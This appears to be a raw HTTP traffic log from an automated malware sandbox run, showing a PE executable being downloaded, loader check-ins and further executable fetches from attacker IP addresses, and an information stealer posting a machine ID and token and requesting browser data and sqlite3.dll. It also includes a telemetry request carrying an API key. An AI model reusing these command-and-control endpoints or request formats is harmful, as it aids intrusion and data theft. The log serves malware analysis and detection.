00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 04 Nov 2024 16:33:39 GMTContent-Type: application/octet-streamContent-Length: 2124288Last-Modified: Mon, 04 Nov 2024 16:30:39 GMTConnection: keep-aliveETag: "6728f6af-206a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 20 72 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 72 00 00 04 00 00 c1 20 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 90 2e 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 2e 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 2e 00 00 10 00 00 00 76 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 80 2e 00 00 00 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 2e 00 00 02 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 a0 2e 00 00 02 00 00 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 61 77 70 6c 72 66 78 00 c0 19 00 00 50 58 00 00 b8 19 00 00 8a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 74 6d 75 68 78 6a 71 00 10 00 00 00 10 72 00 00 06 00 00 00 42 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 20 72 00 00 22 00 00 00 48 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 04 Nov 2024 16:36:28 GMTContent-Type: application/octet-streamContent-Length: 2124288Last-Modified: Mon, 04 Nov 2024 16:30:39 GMTConnection: keep-aliveETag: "6728f6af-206a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 20 72 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 72 00 00 04 00 00 c1 20 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 90 2e 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 2e 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 2e 00 00 10 00 00 00 76 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 80 2e 00 00 00 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 2e 00 00 02 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 a0 2e 00 00 02 00 00 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 61 77 70 6c 72 66 78 00 c0 19 00 00 50 58 00 00 b8 19 00 00 8a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 74 6d 75 68 78 6a 71 00 10 00 00 00 10 72 00 00 06 00 00 00 42 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 20 72 00 00 22 00 00 00 48 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 04 Nov 2024 16:36:38 GMTContent-Type: application/octet-streamContent-Length: 2124288Last-Modified: Mon, 04 Nov 2024 16:30:39 GMTConnection: keep-aliveETag: "6728f6af-206a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 20 72 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 72 00 00 04 00 00 c1 20 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 90 2e 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 2e 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 2e 00 00 10 00 00 00 76 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 80 2e 00 00 00 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 2e 00 00 02 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 a0 2e 00 00 02 00 00 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 61 77 70 6c 72 66 78 00 c0 19 00 00 50 58 00 00 b8 19 00 00 8a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 74 6d 75 68 78 6a 71 00 10 00 00 00 10 72 00 00 06 00 00 00 42 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 20 72 00 00 22 00 00 00 48 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 04 Nov 2024 16:37:11 GMTContent-Type: application/octet-streamContent-Length: 2124288Last-Modified: Mon, 04 Nov 2024 16:30:39 GMTConnection: keep-aliveETag: "6728f6af-206a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 20 72 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 72 00 00 04 00 00 c1 20 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 90 2e 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 2e 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 2e 00 00 10 00 00 00 76 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 80 2e 00 00 00 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 2e 00 00 02 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 a0 2e 00 00 02 00 00 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 61 77 70 6c 72 66 78 00 c0 19 00 00 50 58 00 00 b8 19 00 00 8a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 74 6d 75 68 78 6a 71 00 10 00 00 00 10 72 00 00 06 00 00 00 42 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 20 72 00 00 22 00 00 00 48 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: POST /OneCollector/1.0/ HTTP/1.1Accept: /APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAENhIsZk1icdmK4NNtUk6KLPgAMvy17Udgd1MlHE7GXRAxu9wDd84HaOk1nGIMKru6radFnZDfu7zWhcmz9j72MdI/lM5JykN5JyMCsrKKjhnWsxMrSmUTHFAm4lCtsR/4kXJ5OVGBubVm1qKlLaqfTPe4/QIS6EsPZhp2A+GbXPmd9v7KWe0y9ZBVkGnVgT2XAL69MHD65Z2sZ/bvdyK2Z9GRgl5dhajOwb9unLzQz2LihgZzhVMiIEIlP0Ox0qtNEB072yB6rGFSpbQMfXp3Qm9wrLMHPG0cNIMKQ3+lgA3sY/VTGnPGJVnsHSsfW8D9dyBIAE=&p=Client-Id: NO_AUTHContent-Encoding: deflateContent-Type: application/bond-compact-binaryExpect: 100-continueSDK-Version: EVT-Windows-C++-No-3.4.15.1Upload-Time: 1730738177377Host: self.events.data.microsoft.comContent-Length: 7973Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET /files/pisos23.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 33 38 39 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003895001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 33 38 39 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003896001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 33 38 39 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003897001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJEHJJKJEGHJJKEBFBGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 45 48 4a 4a 4b 4a 45 47 48 4a 4a 4b 45 42 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 42 42 43 38 34 33 45 42 33 35 39 32 33 39 38 39 38 39 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 48 4a 4a 4b 4a 45 47 48 4a 4a 4b 45 42 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 48 4a 4a 4b 4a 45 47 48 4a 4a 4b 45 42 46 42 47 2d 2d 0d 0a Data Ascii: ------HJJEHJJKJEGHJJKEBFBGContent-Disposition: form-data; name="hwid"EBBC843EB3592398989009------HJJEHJJKJEGHJJKEBFBGContent-Disposition: form-data; name="build"tale------HJJEHJJKJEGHJJKEBFBG--
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKKJEBAAECBGDHIECAKJHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 45 42 41 41 45 43 42 47 44 48 49 45 43 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 30 30 31 31 65 62 35 63 62 38 33 39 33 66 34 62 62 33 63 66 36 63 35 35 39 39 31 34 37 31 31 39 38 33 38 36 34 32 36 62 34 39 64 64 37 37 39 65 63 31 30 39 30 66 38 61 38 31 30 63 66 62 37 30 65 36 31 66 61 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 45 42 41 41 45 43 42 47 44 48 49 45 43 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 45 42 41 41 45 43 42 47 44 48 49 45 43 41 4b 4a 2d 2d 0d 0a Data Ascii: ------KKKJEBAAECBGDHIECAKJContent-Disposition: form-data; name="token"ba0011eb5cb8393f4bb3cf6c55991471198386426b49dd779ec1090f8a810cfb70e61fa3------KKKJEBAAECBGDHIECAKJContent-Disposition: form-data; name="message"browsers------KKKJEBAAECBGDHIECAKJ--
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDHIDAEHCFHJJJJECAAHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 30 30 31 31 65 62 35 63 62 38 33 39 33 66 34 62 62 33 63 66 36 63 35 35 39 39 31 34 37 31 31 39 38 33 38 36 34 32 36 62 34 39 64 64 37 37 39 65 63 31 30 39 30 66 38 61 38 31 30 63 66 62 37 30 65 36 31 66 61 33 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 41 2d 2d 0d 0a Data Ascii: ------EHDHIDAEHCFHJJJJECAAContent-Disposition: form-data; name="token"ba0011eb5cb8393f4bb3cf6c55991471198386426b49dd779ec1090f8a810cfb70e61fa3------EHDHIDAEHCFHJJJJECAAContent-Disposition: form-data; name="message"plugins------EHDHIDAEHCFHJJJJECAA--
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JECAFHJEGCFCBFIEGCAEHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 43 41 46 48 4a 45 47 43 46 43 42 46 49 45 47 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 30 30 31 31 65 62 35 63 62 38 33 39 33 66 34 62 62 33 63 66 36 63 35 35 39 39 31 34 37 31 31 39 38 33 38 36 34 32 36 62 34 39 64 64 37 37 39 65 63 31 30 39 30 66 38 61 38 31 30 63 66 62 37 30 65 36 31 66 61 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 41 46 48 4a 45 47 43 46 43 42 46 49 45 47 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 41 46 48 4a 45 47 43 46 43 42 46 49 45 47 43 41 45 2d 2d 0d 0a Data Ascii: ------JECAFHJEGCFCBFIEGCAEContent-Disposition: form-data; name="token"ba0011eb5cb8393f4bb3cf6c55991471198386426b49dd779ec1090f8a810cfb70e61fa3------JECAFHJEGCFCBFIEGCAEContent-Disposition: form-data; name="message"fplugins------JECAFHJEGCFCBFIEGCAE--
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBFHJEGDAFHIJKECFBKJHost: 185.215.113.206Content-Length: 6303Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 33 38 39 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003898001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 33 38 39 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003899001&unit=246122658369
